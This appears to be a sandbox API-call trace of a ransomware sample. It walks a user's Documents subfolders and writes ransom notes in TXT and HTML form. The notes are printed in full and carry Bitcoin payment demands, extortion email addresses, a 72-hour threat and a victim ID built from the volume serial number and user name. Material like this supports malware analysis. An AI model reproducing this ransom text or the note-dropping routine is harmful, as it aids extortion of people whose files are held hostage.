	[0187.133] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1
	[0187.133] lstrcmpW (lpString1="My Music", lpString2="..") returned 1
	[0187.133] lstrcmpW (lpString1="My Music", lpString2=".") returned 1
	[0187.133] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned="C:\\Users\\RDhJ0CNFevzX\\Documents"
	[0187.133] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0187.133] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="My Music" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music"
	[0187.133] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music"
	[0187.134] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\"
	[0187.134] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\"
	[0187.134] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\*.*"
	[0187.134] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my music\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="shell32.dll")) returned 0xffffffff
	[0187.134] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0187.134] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music"
	[0187.135] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\*.*"
	[0187.135] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0187.139] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0187.139] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\HELP_DECRYPT_YOUR_FILES.TXT") returned 68
	[0187.139] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my music\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0187.140] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0187.140] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0187.143] CloseHandle (hObject=0x384) returned 1
	[0187.143] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0187.144] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.144] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0187.145] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0187.145] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my music\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0187.146] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0187.146] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0187.146] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0187.146] CloseHandle (hObject=0x384) returned 1
	[0187.147] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0187.147] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0187.147] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0187.147] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\HELP_DECRYPT_YOUR_FILES.HTML") returned 69
	[0187.147] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my music\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0187.148] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0187.148] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0187.152] CloseHandle (hObject=0x384) returned 1
	[0187.152] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0187.153] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0187.153] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.154] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0187.155] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0187.155] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my music\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0187.155] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0187.156] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0187.156] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0187.156] CloseHandle (hObject=0x384) returned 1
	[0187.156] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my music\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="shell32.dll")) returned 0xffffffff
	[0187.156] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0187.156] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1
	[0187.157] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1
	[0187.157] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1
	[0187.157] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned="C:\\Users\\RDhJ0CNFevzX\\Documents"
	[0187.157] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0187.157] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="My Pictures" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures"
	[0187.157] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures"
	[0187.157] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\"
	[0187.158] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\"
	[0187.158] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\*.*"
	[0187.158] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my pictures\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="shell32.dll")) returned 0xffffffff
	[0187.158] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0187.158] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures"
	[0187.158] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\*.*"
	[0187.158] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0187.159] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0187.159] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\HELP_DECRYPT_YOUR_FILES.TXT") returned 71
	[0187.159] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my pictures\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0187.161] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0187.161] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0187.165] CloseHandle (hObject=0x384) returned 1
	[0187.165] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0187.166] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.166] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0187.181] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0187.181] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my pictures\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0187.181] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0187.182] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0187.182] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0187.183] CloseHandle (hObject=0x384) returned 1
	[0187.184] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0187.184] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0187.185] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0187.185] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\HELP_DECRYPT_YOUR_FILES.HTML") returned 72
	[0187.185] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my pictures\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0187.185] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0187.186] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0187.189] CloseHandle (hObject=0x384) returned 1
	[0187.189] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0187.189] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0187.190] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.190] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0187.191] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0187.191] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my pictures\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0187.192] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0187.192] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0187.192] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0187.192] CloseHandle (hObject=0x384) returned 1
	[0187.192] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\my pictures\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="shell32.dll")) returned 0xffffffff
	[0187.193] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
